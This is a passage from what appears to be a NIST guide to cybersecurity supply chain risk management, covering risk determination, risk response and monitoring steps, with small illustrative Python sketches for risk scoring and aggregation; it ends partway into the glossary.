RISK DETERMINATION
TASK 2-2: Determine the risk to enterprise operations and assets, individuals, other enterprises,
and the Nation if identified threats exploit identified vulnerabilities.
Supplemental Guidance
Enterprises identify cybersecurity risks throughout the supply chain by considering the
likelihood that known threats exploit known vulnerabilities to and through the supply chain, as
well as the resulting consequences or adverse impacts (i.e., magnitude of harm) if such
exploitations occur. Enterprises use threat and vulnerability information with likelihood and
consequences/impact information to determine C-SCRM risk either qualitatively or
quantitatively. Outputs from the Risk Determination at Level 1 and Level 2 should correspond
directly with the RMF Prepare – Enterprise Level tasks described in [NIST SP 800-37, Rev. 2],
while risk assessments completed for Level 3 should correspond directly with the RMF Prepare –
Operational Level tasks.
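As a simple illustration of a qualitative risk determination (a sketch only; the ordinal scales and the multiplication-and-threshold mapping are assumptions that an enterprise would define during the Frame step, in the spirit of the matrices in [NIST SP 800-30, Rev. 1]):

```python
# Ordinal scales an enterprise might define during the Frame step (assumed here).
LEVELS = ["very low", "low", "moderate", "high", "very high"]

def risk_exposure(likelihood: str, impact: str) -> str:
    """Combine qualitative likelihood and impact ratings into a risk rating.

    The mapping below is an illustrative assumption; enterprises would
    define their own matrix.
    """
    score = LEVELS.index(likelihood) * LEVELS.index(impact)  # 0..16
    if score >= 12:
        return "very high"
    if score >= 8:
        return "high"
    if score >= 4:
        return "moderate"
    if score >= 1:
        return "low"
    return "very low"

print(risk_exposure("high", "moderate"))  # 3 * 2 = 6 -> "moderate"
```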
Likelihood
Likelihood is a weighted factor based on a subjective analysis of the probability that a given
threat is capable of exploiting a given vulnerability [CNSSI 4009]. Determining this likelihood
requires consideration of the characteristics of the threat sources, the identified vulnerabilities,
and the enterprise’s susceptibility to the supply chain cybersecurity compromise prior to and
while the safeguards or mitigations are implemented. Likelihood determination should draw on
methodologies defined as part of the Frame step and update, refine, and expand any assumptions
made about likelihood. For adversarial threats, this analysis should consider the degree of an
adversary’s capability and intent to interfere with the enterprise’s mission. A cybersecurity
supply chain risk assessment should consider two views:
1. The likelihood that one or more elements within the supply chain itself is compromised.
This may impact, for example, the availability of quality components or increase the risk
of intellectual property theft.
2. The likelihood of the system or component within the supply chain being compromised,
for example, by malicious code inserted into a system or an electrical storm damaging a
component.
In some cases, these two views may overlap or be indistinguishable, but both may have an
impact on the agency’s ability to perform its mission.
A likelihood determination should consider:
• Threat assumptions that articulate the types of threats that the system or the component
may be subject to, such as cybersecurity threats, natural disasters, or physical security
threats
• Actual supply chain threat information, such as adversaries’ capabilities, tools, intentions,
and targets
• Historical data about the frequency of supply chain events in peer or like enterprises
• Internal expert perspectives on the probability of a system or process compromise
through the supply chain
• Exposure of components to external access (i.e., outside of the system boundary)
• Identified system, process, or component vulnerabilities
• Empirical data on weaknesses and vulnerabilities available from any completed analysis
(e.g., system analysis, process analysis) to determine the probabilities of supply chain
cybersecurity threat occurrence
Factors for consideration include the ease or difficulty of successfully attacking through a
vulnerability and the ability to detect the method employed to introduce or trigger a
vulnerability. The objective is to assess the net effect of the vulnerability, which will be
combined with threat information to determine the likelihood of successful attacks within a
defined time frame as part of the risk assessment process. The likelihood can be based on threat
assumptions or actual threat data, such as previous breaches of the supply chain, specific
adversary capabilities, historical breach trends, or the frequency of breaches. The enterprise may
use empirical data and statistical analysis to determine the specific probabilities of breach
occurrence, depending on the type of data available and accessible within the enterprise.
Impact
Enterprises should begin impact analysis using methodologies and potential impact assumptions
defined during the Frame step to determine the impact of a compromise and the impact of
mitigating said compromise. Enterprises need to identify the various adverse impacts of
compromise, including 1) the characteristics of the threat sources that could initiate the events, 2)
identified vulnerabilities, and 3) the enterprise’s susceptibility to such events based on planned or
implemented countermeasures. Impact analysis is an iterative process performed when a compromise first occurs, when a mitigation approach is selected in order to evaluate the impact of that change, and throughout the SDLC whenever the situation or context of the system or its environment changes.
Enterprises should use the results of an impact analysis to define an acceptable level of
cybersecurity risks throughout the supply chain related to a specific system. Impact is derived
from criticality, threat, and vulnerability analysis results and should be based on the magnitude
of effect on enterprise operations, enterprise assets, individuals, other enterprises, or the Nation
(including the national security interests of the United States) of a loss of confidentiality,
integrity, or availability of information or an information system [NIST SP 800-53, Rev. 5].
Impact is likely to be a qualitative measure requiring analytic judgment. Executives and decision makers use impact as an input into risk-based decisions on whether to accept, avoid, mitigate, or share the resulting risks, along with the consequences of such decisions.
Enterprises should document the overall results of assessments of cybersecurity risk throughout
the supply chain in risk assessment reports.69 Cybersecurity supply chain risk assessment reports
should cover risks in all three enterprise levels, as applicable. Based on the enterprise structure
and size, multiple assessment reports on cybersecurity risks throughout the supply chain may be
required. Agencies are encouraged to develop individual reports at Level 1. For Level 2,
agencies should integrate cybersecurity risks throughout the supply chain into the respective
mission-level business impact analysis (BIA) and may want to develop separate mission-level
assessment reports on cybersecurity risks throughout the supply chain. For Level 3, agencies
may want to integrate cybersecurity risks throughout the supply chain into the respective Risk
Response Framework. Risk Response Frameworks at all three levels should be interconnected,
reference each other when appropriate, integrate with the C-SCRM Plans, and comprise part of
authorization packages.
Aggregation
Enterprises may use risk aggregation to combine several discrete or lower-level risks into a more
general or higher-level risk [NIST SP 800-30, Rev. 1]. Risk aggregation is especially important
for C-SCRM as enterprises strive to understand their risk exposure to the supply chain in contrast
to assets at different levels of the organization. Ultimately, enterprises may wish to aggregate and
normalize their C-SCRM risk assessment results with other enterprise risk assessments to
develop an understanding of their total risk exposure across risk types (e.g., financial,
operational, legal/regulatory). This aggregation may occur at an enterprise level in cases where
the enterprise consists of multiple subordinate enterprises. Each subordinate enterprise would
combine and normalize risks within a single enterprise risk register. Risk aggregation may also
occur from Level 2 mission and business process level registers into a single Level 1 enterprise-
level risk register. To ease this process, enterprises should maximize inheritance of common
frameworks and lexicons from higher-order risk processes (e.g., enterprise risk management).
When dealing with discrete risks (i.e., non-overlapping), enterprises can more easily develop a
holistic understanding of aggregate Level 1 and Level 2 risk exposures. In many cases, however,
69 See [NIST SP 800-30, Rev. 1] Appendix K for a description of risk assessment reports.
enterprises will find that risk assessments completed at lower levels contain overlapping estimates for likelihood and impact magnitude. In these cases, the sum of the pieces (i.e., risk exposure ratings at lower levels) is greater than the whole (i.e., the aggregate risk exposure of the enterprise). To overcome these challenges, enterprises can employ a variety of techniques.
Enterprises may elect to use visualizations or heat maps to demonstrate the likelihood and impact
of risks relative to one another. When presenting aggregate risk as a number, enterprises should
ensure that assessments of risk produce discrete outputs by adopting mutually exclusive and
collectively exhaustive (MECE) frameworks. MECE frameworks guide the analysis of inputs
(e.g., threats, vulnerabilities, impacts) and allow the enterprise to minimize overlapping
assumptions and estimates. Instead of summing risks from lower levels together, enterprises may
elect to perform a new holistic assessment at an upper level that leverages the combined
assessment results from lower levels. Doing so can help enterprises avoid double-counting risks,
resulting in an overestimation of their aggregate risk exposure. Enterprises should apply
discretion in aggregating risks so as to avoid risk aggregations that are difficult to explain (e.g.,
combining highly differentiated scenarios into a single number).
Quantitative methods offer distinct advantages for risk aggregation. Through the use of
probabilistic techniques (e.g., Monte Carlo methods, Bayesian analysis), enterprises can combine
similar risks into a single, easily understood figure (e.g., dollars) in a mathematically defensible
manner. Mutually exclusive and collectively exhaustive frameworks remain an important
requirement for quantitative methods.
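For example, the following minimal Monte Carlo sketch (illustrative only; the event probabilities and loss distributions are assumptions an enterprise would derive from its own data) aggregates two MECE-framed supply chain risks into annualized dollar figures:

```python
import random

random.seed(1)          # reproducible illustration
TRIALS = 100_000

def simulate_annual_loss() -> float:
    """One simulated year of losses across two MECE-framed risks (assumed parameters)."""
    loss = 0.0
    # Risk A: critical supplier compromise; assumed 5% annual probability,
    # lognormal losses with a median near $2M when the event occurs.
    if random.random() < 0.05:
        loss += random.lognormvariate(14.5, 0.5)
    # Risk B: counterfeit component acceptance; assumed 10% annual probability,
    # lognormal losses with a median near $200k.
    if random.random() < 0.10:
        loss += random.lognormvariate(12.2, 0.4)
    return loss

losses = sorted(simulate_annual_loss() for _ in range(TRIALS))
mean = sum(losses) / TRIALS
p95 = losses[int(0.95 * TRIALS)]
print(f"expected annual loss: ${mean:,.0f}; 95th percentile: ${p95:,.0f}")
```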
Outputs and Post Conditions
This step results in:
• Confirmed mission and business process criticality,
• The establishment of relationships between the critical aspects of the system’s supply
chain infrastructure (e.g., SDLC) and applicable threats and vulnerabilities,
• Understanding of the likelihood and impact of a potential supply chain cybersecurity
compromise,
• Understanding mission and system-specific risks,
• Documented assessments of cybersecurity risks throughout the supply chain related to
mission and business processes or individual systems, and
• The integration of results of relevant assessments of cybersecurity risks throughout
supply chain into the enterprise risk management process.
Respond
Inputs and Preconditions
Respond is the step in which the individuals conducting the risk assessment will communicate
the assessment results, proposed mitigation/controls options, and the corresponding acceptable
level of risk for each proposed option to the decision makers. This information should be
presented in an appropriate manner to inform and guide risk-based decisions. This will allow
decision makers to finalize appropriate risk responses based on the set of options and the
corresponding risk factors of choosing the various options. Sometimes, an appropriate response
is to simply monitor the adversary’s activities and behavior to better understand the tactics and
activities.
Cybersecurity supply chain risk response should be integrated into the overall enterprise risk
response. Figure G-7 depicts the Respond step with its inputs and outputs along the three enterprise levels.
Fig. G-7: C-SCRM in the Respond Step70

70 More detailed information on the Risk Management Process can be found in Appendix C.

Enterprise (Level 1)
Inputs: Output of Level 1 C-SCRM risk framing; enterprise-level C-SCRM policies and procedures, including risk response guidance; and Level 1, Level 2, and Level 3 assessments of cybersecurity risks in the supply chain.
Respond activities: Make enterprise-level risk response decisions (e.g., accept, avoid, mitigate, share, and/or transfer); select, tailor, and implement C-SCRM controls and Level 1 common control baselines; and document C-SCRM controls in POA&Ms.
Outputs: Enterprise-level supply chain cybersecurity risk response decisions; refined/enhanced C-SCRM POA&Ms; and feedback to enterprise-level foundational processes that are not C-SCRM.

Mission/Business Process (Level 2)
Inputs: Output of Level 2 C-SCRM risk framing; mission/business-specific policies and procedures, including risk response guidance; and Level 2 and Level 3 supply chain cybersecurity risk assessment results.
Respond activities: Make mission/business-specific risk response decisions (e.g., accept, avoid, mitigate, share, and/or transfer); select, tailor, and implement C-SCRM controls and Level 2 common control baselines; and document C-SCRM controls in POA&Ms.
Outputs: Mission/business-specific supply chain cybersecurity risk response decisions; refined/enhanced C-SCRM POA&Ms; and feedback to mission/business-level foundational processes that are not C-SCRM.

Operational (Level 3)
Inputs: Operational-level supply chain cybersecurity risk assessment results.
Respond activities: Make operational-specific risk response decisions (e.g., accept, avoid, mitigate, share, and/or transfer); select, tailor, and implement C-SCRM controls; and document C-SCRM controls in C-SCRM plans.
Outputs: Operational-level supply chain cybersecurity risk decisions; new/refined/enhanced C-SCRM plans; and feedback to operational-level foundational processes that are not C-SCRM.
Activities
RISK RESPONSE IDENTIFICATION
TASK 3-1: Identify alternative courses of action to respond to risks identified during the risk
assessment.
An enterprise's risk response strategies will be informed by the risk management strategies developed for the enterprise (i.e., Level 1) and its mission and business processes (i.e., Level 2). Risk response strategies will include general courses of action that the enterprise may take as part of its risk response efforts (e.g., accept, avoid, mitigate, transfer, or share). As part of mitigation efforts,
enterprises should select C-SCRM controls and tailor these controls based on the risk
determination. C-SCRM controls should be selected for all three levels, as appropriate per the
findings of the risk assessments for each of the levels.
Many of the C-SCRM controls included in this document may be part of an IT security plan and
should be incorporated as requirements into agreements made with third-party providers. These
controls are included because they apply to C-SCRM.
This process should begin by determining acceptable risks to support the evaluation of
alternatives (also known as trade-off analysis).
EVALUATION OF ALTERNATIVES
TASK 3-2: Evaluate alternative courses of action for responding to risk.
Once an initial acceptable level of risk has been defined, risk response courses of action should
be identified and evaluated for efficacy in enabling the enterprise to achieve its defined risk
threshold. An evaluation of alternatives typically occurs at Level 1 or Level 2 with a focus on
anticipated enterprise-wide impacts of C-SCRM on the enterprise’s ability to successfully carry
out enterprise missions and processes. When carried out at Level 3, an evaluation of alternatives
focuses on the SDLC or the amount of time available for implementing the course of action.
Each course of action analyzed may include a combination of risk acceptance, avoidance,
mitigation, transfer, and sharing. For example, an enterprise may elect to share a portion of its
risk with a strategic supplier through the selection of controls included under contractual terms.
Alternatively, an enterprise may choose to mitigate risks to acceptable levels through the
selection and implementation of controls. In many cases, risk strategies will leverage a
combination of risk response courses of action.
During the evaluation of alternatives, the enterprise will analyze available risk response courses
of action for identified cybersecurity risks throughout the supply chain. The goal of this exercise
is to enable the enterprise to achieve an appropriate balance between C-SCRM and the
functionality needs of the enterprise. As a first step, enterprises should ensure that risk appetites
and tolerances, priorities, trade-offs, applicable requirements, and constraints are reviewed with
stakeholders who are familiar with the broader enterprise requirements, such as cost, schedule,
performance, policy, and compliance. Through this process, the enterprise will identify risk
response implications to the enterprise’s broader requirements. Equipped with a holistic
understanding of risk response implications, enterprises should perform the C-SCRM, mission,
and operational-level trade-off analyses to identify the correct balance of C-SCRM controls to
respond to risk. At Level 3, the Frame, Assess, Respond, and Monitor process feeds into the
RMF Select step described in [NIST SP 800-37, Rev. 2].
The selected C-SCRM controls for a risk response course of action will vary depending on where they are applied within enterprise levels and SDLC processes. For example, C-SCRM controls may range from using a blind buying strategy to obscure the end use of a critical component to design attributes (e.g., input validation, sandboxes, and anti-tamper design). For each implemented control, the enterprise should identify someone who will be responsible for its execution and develop a time- or event-phased plan for implementation throughout the SDLC.
Multiple controls may address a wide range of possible risks. Understanding how the controls affect the overall risk is therefore essential and must be considered before choosing and tailoring the combination of controls; yet another trade-off analysis may be needed before the controls can be finalized. The enterprise may unknowingly trade one risk for a larger risk if the dependencies between the proposed controls and the overall risk are not well understood and addressed.
RISK RESPONSE DECISION
TASK 3-3: Decide on the appropriate course of action for responding to risk.
As described in [NIST SP 800-39], enterprises should select, tailor, and finalize C-SCRM
controls based on an evaluation of alternatives and an overall understanding of threats, risks, and
supply chain priorities. Within Level 1 and Level 2, the resulting decision and the selected and
tailored common control baselines (i.e., revisions to established baselines) should be documented
within a C-SCRM-specific Risk Response Framework.71 Within Level 3, the resulting decision
and the selected and tailored controls should be documented within the C-SCRM plan as part of
an authorization package.
Risk response decisions may be made by a risk executive or delegated by the risk executive to
someone else in the enterprise. While the decision can be delegated to Level 2 or Level 3, the
significance and the reach of the impact should determine the level at which the decision is being
made. Risk response decisions may be made in collaboration with an enterprise’s risk executives,
mission owners, and system owners, as appropriate. Risk response decisions are heavily
influenced by the enterprise’s predetermined appetite and tolerance for risk. Using robust risk
appetite and tolerance definitions, decision makers can ensure consistent alignment of the
enterprise’s risk decisions with its strategic imperatives. Robust definitions of risk appetite and
tolerance may also enable enterprises to delegate risk decision responsibility to lower levels of
the enterprise and provide greater autonomy across all levels.
Within Level 1 and Level 2, the resulting decisions should be documented with any changes to requirements or selected common control baselines (i.e., at the enterprise or mission and business process level) within C-SCRM-specific Risk Response Frameworks.71 The C-SCRM Risk Response Framework may influence other related Risk Response Frameworks.

71 More information on Risk Response Frameworks and explicit examples can be found in Appendix B.
The Risk Response Framework should include (see the illustrative sketch after this list):
• A description of the threat source, threat event, exploited vulnerability, and threat event outcome;
• An analysis of the likelihood and impact of the risk and the final risk exposure; and
• A description of the selected mitigating strategies and controls, along with an estimate of the cost and effectiveness of the mitigation against the risk.
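A minimal sketch of one such framework entry as a record type (the field names are assumptions for illustration, not a prescribed schema):

```python
from dataclasses import dataclass

@dataclass
class RiskResponseEntry:
    """Illustrative Risk Response Framework entry; field names are assumed."""
    threat_source: str
    threat_event: str
    exploited_vulnerability: str
    threat_event_outcome: str
    likelihood: str                # qualitative rating from the risk assessment
    impact: str                    # qualitative rating from the risk assessment
    final_risk_exposure: str
    mitigating_controls: str       # selected strategies and C-SCRM controls
    mitigation_cost: float         # estimated cost of the mitigation
    mitigation_effectiveness: str  # estimated effectiveness against the risk
```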
Within Level 3, the resulting decision and the selected and tailored controls should be
documented in a C-SCRM plan. While the C-SCRM plan is ideally developed proactively, it
may also be developed in response to a supply chain cybersecurity compromise. Ultimately, the
C-SCRM plan should cover the full SDLC, document a C-SCRM baseline, and identify
cybersecurity supply chain requirements and controls at the Level 3 operational level. The C-
SCRM plan should be revised and updated based on the output of cybersecurity supply chain
monitoring.
C-SCRM plans should:
• Summarize the environment as determined in the Frame step, such as applicable policies,
processes, and procedures based on enterprise and mission requirements currently
implemented in the enterprise
• State the role responsible for the plan, such as Risk Executive, Chief Financial Officer
(CFO), Chief Information Officer (CIO), program manager, or system owner
• Identify key contributors, such as CFO, Chief Operations Officer (COO),
acquisition/contracting, procurement, C-SCRM PMO, system engineer, system security
engineer, developer/maintenance engineer, operations manager, or system architect
• Provide the applicable (per level) set of risk mitigation measures and controls resulting
from the evaluation of alternatives (in the Respond step)
• Provide tailoring decisions for selected controls, including the rationale for the decision
• Describe feedback processes among the levels to ensure that cybersecurity supply chain
interdependencies are addressed
• Describe monitoring and enforcement activities (including auditing, if appropriate)
applicable to the scope of each specific C-SCRM plan
• If appropriate, state qualitative or quantitative measures to support the implementation of
the C-SCRM plan and assess the effectiveness of the implementation72
• Define a frequency for reviewing and revising the plan
• Include criteria that would trigger revision, such as life cycle milestones, gate reviews, or
significant contracting activities
• Include suppliers, developers, system integrators, external system service providers, and other ICT/OT-related service providers in C-SCRM plans if they are made available as part of agreements

72 NIST SP 800-55, Rev. 1, Performance Measurement Guide for Information Security (July 2008), provides guidance on developing information security measures. Agencies can use general guidance in that publication to develop specific measures for their C-SCRM plans. See http://csrc.nist.gov/publications/nistpubs/800-55-Rev1/SP800-55-rev1.pdf.
Agencies may want to integrate C-SCRM controls into the respective system security plans or
develop separate operational-level C-SCRM plans. At Level 3, the C-SCRM plan applies to high- and moderate-impact systems, per [FIPS 199]. Requirements and inputs from the enterprise C-SCRM strategy at Level 1 and the mission C-SCRM strategy and implementation plan at Level 2 should flow down and be used to guide the development of C-SCRM plans at Level 3.
Conversely, the C-SCRM controls and requirements at Level 3 should be considered when
developing and revising the requirements and controls applied at the higher levels. C-SCRM
plans should be interconnected and reference each other when appropriate.
Table G-9 summarizes the controls to be contained in Risk Response Frameworks at Level 1 and
Level 2, the C-SCRM plans at Level 3, and examples of those controls.
Table G-9: Controls at Levels 1, 2, and 3

Level 1

Controls:
• Provides enterprise common control baselines to Level 2 and Level 3

Examples:
• Minimum sets of controls applicable to all suppliers, developers, system integrators, external system service providers, and other ICT/OT-related service providers
• Enterprise-level controls applied to processing and storing supplier, developer, system integrator, external system service provider, and other ICT/OT-related service provider information
• Cybersecurity supply chain training and awareness for acquirer staff at the enterprise level

Level 2

Controls:
• Inherits common controls from Level 1
• Provides mission and business process-level common control baseline to Level 3
• Provides feedback to Level 1 about what is working and what needs to be changed

Examples:
• Minimum sets of controls applicable to suppliers, developers, system integrators, external system service providers, and other ICT/OT-related service providers for the specific mission and business process
• Program-level refinement of Identity and Access Management controls to address C-SCRM concerns
• Program-specific supply chain training and awareness

Level 3

Controls:
• Inherits common controls from Level 1 and Level 2
• Provides system-specific controls for Level 3
• Provides feedback to Level 1 and Level 2 about what is working and what needs to be changed

Examples:
• Minimum sets of controls applicable to service providers or specific hardware and software for the individual system
• Appropriately rigorous acceptance criteria for change management for systems that support the supply chain (e.g., testing or integrated development environments)
• System-specific cybersecurity supply chain training and awareness
• Intersections with the SDLC
Appendix C provides an example C-SCRM plan template with the sections and types of
information that enterprises should include in their C-SCRM planning activities.
RISK RESPONSE IMPLEMENTATION
TASK 3-4: Implement the course of action selected to respond to risk.
Enterprises should implement the C-SCRM plan in a manner that integrates the C-SCRM
controls into the overall agency risk management processes.
Outputs and Post Conditions
The output of this step is a set of C-SCRM controls that address C-SCRM requirements and can
be incorporated into the system requirements baseline and agreements with third-party providers.
These requirements and resulting controls will be incorporated into the SDLC and other
enterprise processes throughout the three levels.
For general risk types, this step results in:
• Selected, evaluated, and tailored C-SCRM controls that address identified risks;
• Identified consequences of accepting or not accepting the proposed mitigations; and
• Development and implementation of the C-SCRM plan.
Monitor
Inputs and Preconditions
Monitor is the step in which enterprises 1) verify compliance, 2) determine the ongoing
effectiveness of risk response measures, and 3) identify risk-impacting changes to enterprise
information systems and environments of operation.
Changes to the enterprise, mission and business processes, operations, or the supply chain can
directly impact the enterprise’s cybersecurity supply chain. The Monitor step provides a
mechanism for tracking such changes and ensuring that they are appropriately assessed for
impact (in the Assess step). If the cybersecurity supply chain is redefined as a result of
monitoring, enterprises should coordinate with their suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers to resolve
implications and mutual obligations. A critical component of the Monitor step includes the
upward dissemination of information to inform higher level risk assessments (e.g., mission and
business process assessment informs enterprise assessment). This ensures that enterprise leaders
maintain visibility into risk conditions across the enterprise.
Enterprises should monitor for supply chain risk events to reassess risk and determine
appropriate risk responses. This should include determining whether the event has triggered an
incident or compels the need for information sharing. Examples of supply chain risk events
include:
• Change of ownership, merger, or acquisition
• Disruption to the supply chain
• Continuity or emergency event that affects a source or its supply chain
• Ransomware or other cybersecurity attack that affects a source or its supply chain
• New information about a critical vulnerability that may or does affect technology
used by the source and/or its supply chain
• Discovery of a counterfeit or non-conforming product or component
• Change in location for manufacturing or software development, especially
changes from domestic to foreign locations
• OEM no longer produces and/or supports a product or critical component of a
product
• Evidence of non-disclosed functionality or features of a covered article
• Any notification that requires additional investigation to determine whether an impact to the confidentiality, integrity, or availability of the Federal Government's data and information systems can be directly attributed to an attack involving the refurbishment, tampering, or counterfeiting of ICT products
• Presence of covered articles produced by a prohibited or otherwise non-authorized
source
• Evidence of suspicious Foreign Ownership, Control, or Influence (FOCI)
• Other changes that may negatively affect the risk profile of the source, the
covered article, and/or the associated supply chain (e.g., loss of key personnel,
degradation of the company’s financial health, etc.)
Enterprises should integrate C-SCRM into existing continuous monitoring programs.73 In the
event that a continuous monitoring program does not exist, C-SCRM can serve as a catalyst for
establishing a comprehensive continuous monitoring program. Figure G-8 depicts the Monitor step with inputs and outputs along the three enterprise levels.
73 NIST SP 800-137, Information Security Continuous Monitoring (ISCM) for Federal Information Systems and Organizations
(September 2011), describes how to establish and implement a continuous monitoring program. See
http://csrc.nist.gov/publications/nistpubs/800-137/SP800-137-Final.pdf.
Fig. G-8: C-SCRM in the Monitor Step74

74 More detailed information on the Risk Management Process can be found in Appendix C.

Enterprise (Level 1)
Inputs: Output of Level 1 C-SCRM risk framing; the C-SCRM high-level implementation plan; enterprise-level supply chain cybersecurity risk response decisions; the enterprise's continuous monitoring strategy; and risk assessment results (all levels).
Monitor activities: Integrate C-SCRM into the agency continuous monitoring program; monitor enterprise-level operations, assets, and individuals to verify internal and supply chain C-SCRM compliance, determine the effectiveness of the C-SCRM response, and identify internal and supply chain changes.
Outputs: C-SCRM integrated into the agency continuous monitoring program; regular reporting as a part of the continuous monitoring program; areas of improvement based on reporting; and new or changed constraints that would trigger a reassessment of risk.

Mission/Business Process (Level 2)
Inputs: Output of Level 2 C-SCRM risk framing; the C-SCRM implementation plan; mission/business-specific supply chain cybersecurity risk response decisions; applicable POA&Ms; the mission/business-specific continuous monitoring strategy; and risk assessment results (all levels).
Monitor activities: Identify mission functions to be monitored for C-SCRM change and assessed for impact; integrate C-SCRM into continuous monitoring processes and systems; monitor mission/business-specific operations, assets, and individuals to verify internal and supply chain C-SCRM compliance, determine the effectiveness of the C-SCRM response, and identify internal and supply chain changes.
Outputs: C-SCRM integrated into the mission/business-specific continuous monitoring program; regular reporting as a part of the continuous monitoring program; areas of improvement based on reporting; and new or changed constraints that would trigger a reassessment of risk.

Operational (Level 3)
Inputs: Operational-level continuous monitoring activities; operational C-SCRM requirements; operational-specific supply chain cybersecurity risk decisions; the C-SCRM plan; and operational-level risk assessment results.
Monitor activities: Monitor operational-level operations, assets, and individuals to verify internal and supply chain C-SCRM compliance, determine the effectiveness of the C-SCRM response, and identify internal and supply chain changes.
Outputs: C-SCRM integrated into operational-level continuous monitoring; regular reporting as a part of continuous monitoring activities; areas of improvement based on reporting; and new or changed constraints that would trigger a reassessment of risk.

Activities

RISK MONITORING STRATEGY

TASK 4-1: Develop a risk monitoring strategy for the enterprise that includes the purpose, type, and frequency of monitoring activities.
Supplemental Guidance
Enterprises should integrate C-SCRM considerations into their overall risk monitoring strategy.
Monitoring cybersecurity risks throughout the supply chain may require access to information
that agencies may not have traditionally collected. Some of the information will need to be
gathered from outside of the agency, such as from open sources, suppliers, or integrators. The
strategy should, among other things, include the data to be collected, state the specific measures
compiled from the data (e.g., number of contractual compliance violations by the vendor),
identify existing assumptions about the required tools needed to collect the data, identify how the
data will be protected, and define reporting formats for the data. Potential data sources may
include:
• Agency vulnerability management and incident management activities;
• Agency manual reviews;
• Interagency information sharing;
• Information sharing between the agency and suppliers, developers, system integrators,
external system service providers, and other ICT/OT-related service providers;
• Supplier information sharing; and
• Contractual reviews of suppliers, developers, system integrators, external system service
providers, and other ICT/OT-related service providers.
Enterprises should ensure the appropriate protection of supplier data if that data is collected and
stored by the agency. Agencies may also require additional data collection and analysis tools to
appropriately evaluate the data to achieve the objective of monitoring applicable cybersecurity
risks throughout the supply chain.
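As an illustrative sketch of compiling one such measure (the record layout, vendor names, and finding labels are assumptions), the number of contractual compliance violations by vendor could be derived from collected review records:

```python
from collections import Counter

# Hypothetical records gathered from contractual reviews of suppliers.
review_records = [
    {"vendor": "Acme Components", "finding": "compliance_violation"},
    {"vendor": "Acme Components", "finding": "observation"},
    {"vendor": "Globex Software", "finding": "compliance_violation"},
    {"vendor": "Acme Components", "finding": "compliance_violation"},
]

# Measure: number of contractual compliance violations by vendor.
violations = Counter(
    r["vendor"] for r in review_records if r["finding"] == "compliance_violation"
)
for vendor, count in violations.most_common():
    print(f"{vendor}: {count} violation(s)")
```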
RISK MONITORING
TASK 4-2: Monitor enterprise information systems and environments of operation on an
ongoing basis to verify compliance, determine the effectiveness of risk response measures, and
identify changes.
According to [NIST SP 800-39], enterprises should monitor compliance, effectiveness, and
change. Monitoring compliance within the context of C-SCRM involves monitoring an
enterprise’s processes and supplied products and services for compliance with the established
security and C-SCRM requirements. Monitoring effectiveness involves monitoring the resulting
risks to determine whether the established security and C-SCRM requirements produce the
intended results. Monitoring change involves monitoring the environment for any changes that
would signal changing requirements and mitigations/controls to maintain an acceptable level of
cybersecurity risks throughout the supply chain.
To monitor for changes, enterprises should establish regular intervals at which they review
suppliers and their supplied products and services. The reassessment intervals should be
determined as needed and appropriate for the enterprise. Enterprises also need to identify and
document a set of off-cycle triggers that would signal an alteration to the state of cybersecurity
risks throughout the supply chain. While the categories of triggers will likely include changes to
constraints as identified in Table D-6 (during the Frame step) – such as policy, mission, change
to the threat environment, enterprise architecture, SDLC, or requirements – the specific triggers
within those categories may be substantially different for different enterprises.
An example of a cybersecurity supply chain change is two key vetted suppliers75 announcing
their departure from a specific market, therefore creating a supply shortage for specific
components. This would trigger the need to evaluate whether reducing the number of suppliers
could create vulnerabilities in component availability and integrity. In this scenario, a potential
deficit of components may result from an insufficient supply of components. If none of the
remaining suppliers are vetted, this deficit may result in the uncertain integrity of the remaining
components. If the enterprise policy directs the use of vetted components, this event may result
in the enterprise’s inability to fulfill its mission needs. Supply chain change may also arise as a
result of a company experiencing a change in ownership. A change in ownership could have
significant implications, especially in cases where the change involves a transfer of ownership to
individuals who are citizens of a different country from that of the original owners.
In addition to regularly updating existing risk assessments at all levels of the enterprise with the
results of ongoing monitoring, the enterprise should determine the triggers of a reassessment.
Some triggers may include the availability of resources, changes to cybersecurity risks
throughout the supply chain, natural disasters, or mission collapse.
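A minimal sketch of checking monitored events against documented off-cycle triggers (the trigger set and event fields are assumptions for illustration):

```python
# Hypothetical, enterprise-defined off-cycle triggers that would signal an
# alteration to the state of cybersecurity risks throughout the supply chain.
REASSESSMENT_TRIGGERS = {
    "change_of_ownership",
    "supply_chain_disruption",
    "critical_vulnerability_disclosed",
    "counterfeit_component_discovered",
}

def requires_reassessment(event: dict) -> bool:
    """Return True when a monitored event matches a documented trigger."""
    return event.get("type") in REASSESSMENT_TRIGGERS

events = [
    {"type": "routine_report", "source": "Vendor A"},
    {"type": "change_of_ownership", "source": "Vendor B"},
]
for e in events:
    if requires_reassessment(e):
        print(f"Trigger hit: {e['type']} ({e['source']}); initiate risk reassessment")
```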
In order for monitoring to be effective, the state of cybersecurity supply chain risk management
needs to be communicated to decision makers across the enterprise in the form of C-SCRM
reporting. Reporting should be tailored to meet the specific needs of its intended audience. For
example, reporting to Level 1 decision makers may summarize the C-SCRM implementation
coverage, efficiency, effectiveness, and overall levels of exposure to cybersecurity risks
throughout the supply chain at aggregate levels across the enterprise. Where applicable and
appropriate for the audience, reporting may focus on specific areas in Level 2 and Level 3 that
require executive leadership attention. To aid in tailoring reporting, reporting requirements
should be defined in collaboration with the intended audience and updated periodically to ensure that reporting remains efficient and effective.
Outputs and Post Conditions
Enterprises should integrate the cybersecurity supply chain outputs of the Monitor step into the
C-SCRM plan. This plan will provide inputs into iterative implementations of the Frame, Assess,
and Respond steps as required.
75 A vetted supplier is one with whom the organization is comfortable doing business. This level of comfort is usually achieved
through the development of an organization-defined set of supply chain criteria and then vetting suppliers against those criteria.
APPENDIX H: GLOSSARY
acceptable risk
A level of residual risk to the organization's operations, assets, or individuals that falls within the risk appetite and risk tolerance defined by the organization.
acquirer
[ISO/IEC/IEEE 15288,
adapted]
Organization or entity that acquires or procures a product or
service.
acquisition
[NIST SP 800-64, adapted]
Includes all stages of the process of acquiring products or services, beginning with the process for determining the need for the products or services and ending with contract completion and closeout.
agreement
Mutual acknowledgement of terms and conditions under which a working relationship is conducted, or goods are transferred between parties. EXAMPLE: contract, memorandum of agreement.
authorization boundary
[NIST SP 800-53 Rev. 5]
All components of an information system to be authorized for
operation by an authorizing official. This excludes separately
authorized systems to which the information system is
connected.
authorizing official
[NIST SP 800-53 Rev. 5]
A senior Federal official or executive with the authority to
authorize (i.e., assume responsibility for) the operation of an
information system or the use of a designated set of common
controls at an acceptable level of risk to agency operations
(including mission, functions, image, or reputation), agency
assets, individuals, other organizations, and the Nation.
authorization to operate
